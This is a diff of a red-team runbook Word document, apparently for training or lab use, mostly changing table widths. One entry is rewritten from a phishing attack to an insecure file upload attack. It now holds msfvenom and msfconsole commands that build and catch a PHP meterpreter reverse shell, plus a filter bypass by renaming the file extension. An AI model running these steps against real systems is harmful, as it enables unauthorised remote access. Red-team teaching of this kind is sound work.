         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6339" w:type="dxa"/>
+            <w:tcW w:w="6340" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -2754,7 +2768,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1283" w:type="dxa"/>
+            <w:tcW w:w="1282" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -2813,7 +2827,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6339" w:type="dxa"/>
+            <w:tcW w:w="6340" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -2848,7 +2862,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1283" w:type="dxa"/>
+            <w:tcW w:w="1282" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -2952,12 +2966,12 @@
         <w:tblLook w:val="04a0" w:noHBand="0" w:noVBand="1" w:firstColumn="1" w:lastRow="0" w:lastColumn="0" w:firstRow="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="1526"/>
-        <w:gridCol w:w="496"/>
+        <w:gridCol w:w="1525"/>
+        <w:gridCol w:w="497"/>
         <w:gridCol w:w="2290"/>
         <w:gridCol w:w="2290"/>
-        <w:gridCol w:w="1759"/>
-        <w:gridCol w:w="1283"/>
+        <w:gridCol w:w="1760"/>
+        <w:gridCol w:w="1282"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
@@ -3239,7 +3253,7 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t>Phishing</w:t>
+              <w:t>Insecure File upload</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3406,7 +3420,14 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t>Msfvenom, metasploit</w:t>
+              <w:t xml:space="preserve">Msfvenom, metasploit, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>burpsuite</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3417,7 +3438,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1526" w:type="dxa"/>
+            <w:tcW w:w="1525" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -3464,7 +3485,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="8118" w:type="dxa"/>
+            <w:tcW w:w="8119" w:type="dxa"/>
             <w:gridSpan w:val="5"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -3485,7 +3506,14 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t>This is attack is a phishing attack where the attacker persuades the user to download the reverse shell created by msfvenom</w:t>
+              <w:t xml:space="preserve">This is attack is </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve">to target insecure/unsanatised file uploads. A malicious file will be uploaded that will create a reverse shell on the host machine for the attacker to connect to </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3524,7 +3552,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6339" w:type="dxa"/>
+            <w:tcW w:w="6340" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -3552,7 +3580,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1283" w:type="dxa"/>
+            <w:tcW w:w="1282" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -3611,7 +3639,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6339" w:type="dxa"/>
+            <w:tcW w:w="6340" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -3634,32 +3662,53 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=9001 -f exe -o update.exe</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1283" w:type="dxa"/>
+              <w:t xml:space="preserve">msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=9001 -f </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>php</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -o </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>rev.php</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1282" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -3717,7 +3766,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6339" w:type="dxa"/>
+            <w:tcW w:w="6340" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -3745,7 +3794,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1283" w:type="dxa"/>
+            <w:tcW w:w="1282" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -3798,42 +3847,61 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t>Send file to victim</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6339" w:type="dxa"/>
+              <w:t>Listen for shell</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6340" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:i w:val="false"/>
-                <w:iCs w:val="false"/>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>Send file to victim with persuading text e.g. download update for software, email by IT team</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1283" w:type="dxa"/>
+              <w:pStyle w:val="PreformattedText"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="1" w:name="listener-command"/>
+            <w:bookmarkEnd w:id="1"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 192.168.0.10; set lport 9001; exploit"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1282" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -3891,7 +3959,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6339" w:type="dxa"/>
+            <w:tcW w:w="6340" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -3919,7 +3987,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1283" w:type="dxa"/>
+            <w:tcW w:w="1282" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -3972,61 +4040,42 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t>Listen for shell</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6339" w:type="dxa"/>
+              <w:t>Upload file</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6340" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="PreformattedText"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:bookmarkStart w:id="1" w:name="listener-command"/>
-            <w:bookmarkEnd w:id="1"/>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 192.168.0.10; set lport 9001; exploit"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1283" w:type="dxa"/>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:i w:val="false"/>
+                <w:iCs w:val="false"/>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Locate the upload page. If there is no sanitisation go to the php file and open it creating the reverse shell. If there appears to some security, change the file extension to .php.jpeg, intercept request and change back to .php</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1282" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -4084,7 +4133,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6339" w:type="dxa"/>
+            <w:tcW w:w="6340" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -4112,7 +4161,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1283" w:type="dxa"/>
+            <w:tcW w:w="1282" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -4171,7 +4220,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6339" w:type="dxa"/>
+            <w:tcW w:w="6340" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -4200,13 +4249,13 @@
                 <w:shd w:fill="auto" w:val="clear"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t>Wait for shell to land, priv esc if needed</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1283" w:type="dxa"/>
+              <w:t>Open the location the php file is saved to and connect to shell</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1282" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -4377,5 +4426,28 @@
       <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="TableContents">
+    <w:name w:val="Table Contents"/>
+    <w:basedOn w:val="Normal"/>
+    <w:qFormat/>
+    <w:pPr>
+      <w:widowControl w:val="false"/>
+      <w:suppressLineNumbers/>
+    </w:pPr>
+    <w:rPr/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="TableHeading">
+    <w:name w:val="Table Heading"/>
+    <w:basedOn w:val="TableContents"/>
+    <w:qFormat/>
+    <w:pPr>
+      <w:suppressLineNumbers/>
+      <w:jc w:val="center"/>
+    </w:pPr>
+    <w:rPr>
+      <w:b/>
+      <w:bCs/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
--- a/Red Team Runbooks.docx
+++ b/Red Team Runbooks.docx
@@ -37,12 +37,12 @@
         <w:tblLook w:val="04a0" w:noHBand="0" w:noVBand="1" w:firstColumn="1" w:lastRow="0" w:lastColumn="0" w:firstRow="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="1525"/>
-        <w:gridCol w:w="497"/>
+        <w:gridCol w:w="1523"/>
+        <w:gridCol w:w="499"/>
         <w:gridCol w:w="2290"/>
         <w:gridCol w:w="2290"/>
-        <w:gridCol w:w="1760"/>
-        <w:gridCol w:w="1282"/>
+        <w:gridCol w:w="1762"/>
+        <w:gridCol w:w="1280"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
@@ -502,7 +502,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1525" w:type="dxa"/>
+            <w:tcW w:w="1523" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -549,7 +549,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="8119" w:type="dxa"/>
+            <w:tcW w:w="8121" w:type="dxa"/>
             <w:gridSpan w:val="5"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -609,7 +609,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -637,7 +637,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -696,7 +696,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -717,14 +717,7 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t xml:space="preserve">Perform an aggressive Nmap scan and enumerate all open ports and their headers to determine if there is the vulnerable service. </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>Look for things like ftp, smb, jenkins installs etc.</w:t>
+              <w:t>Perform an aggressive Nmap scan and enumerate all open ports and their headers to determine if there is the vulnerable service. Look for things like ftp, smb, jenkins installs etc.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -769,7 +762,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -827,7 +820,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -855,7 +848,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -914,7 +907,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -935,14 +928,27 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t xml:space="preserve">Run the MSFconsole and select the exploit for the vulnerable service </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>(if the module doesn’t work, try the exploit manually)</w:t>
+              <w:t>Manually explore the service to identify possible exploits</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Run the MSFconsole and select the exploit for the vulnerable service (if the module doesn’t work, try the exploit manually)</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1012,7 +1018,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -1070,7 +1076,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -1098,7 +1104,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -1157,7 +1163,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -1184,7 +1190,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -1242,7 +1248,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -1270,7 +1276,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -1329,7 +1335,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -1364,7 +1370,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -1479,12 +1485,12 @@
         <w:tblLook w:val="04a0" w:noHBand="0" w:noVBand="1" w:firstColumn="1" w:lastRow="0" w:lastColumn="0" w:firstRow="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="1525"/>
-        <w:gridCol w:w="497"/>
+        <w:gridCol w:w="1523"/>
+        <w:gridCol w:w="499"/>
         <w:gridCol w:w="2290"/>
         <w:gridCol w:w="2290"/>
-        <w:gridCol w:w="1760"/>
-        <w:gridCol w:w="1282"/>
+        <w:gridCol w:w="1762"/>
+        <w:gridCol w:w="1280"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
@@ -1944,7 +1950,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1525" w:type="dxa"/>
+            <w:tcW w:w="1523" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -1991,7 +1997,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="8119" w:type="dxa"/>
+            <w:tcW w:w="8121" w:type="dxa"/>
             <w:gridSpan w:val="5"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -2051,7 +2057,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -2079,7 +2085,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -2138,7 +2144,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -2185,7 +2191,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -2243,7 +2249,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -2271,7 +2277,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -2330,7 +2336,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -2346,53 +2352,6 @@
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>Look through the webpage for a login page or a search bar.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>This can be done manually or gobuster can be used</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
